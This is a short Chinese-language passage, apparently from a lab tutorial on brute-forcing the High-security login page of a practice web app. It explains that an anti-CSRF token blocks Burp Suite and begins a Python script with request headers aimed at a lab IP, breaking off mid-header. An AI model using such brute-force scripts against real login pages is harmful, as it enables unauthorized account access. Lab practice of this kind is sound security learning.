由于早High级别的Bruteforce登录页面加入了Anti-CSRFtoken预防无脑爆破,这里就无法用Burpsuite了,下面用Python3.6进行破解
from bs4 import BeautifulSoup
from urllib import request
header={
'Host': '10.10.10.146',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*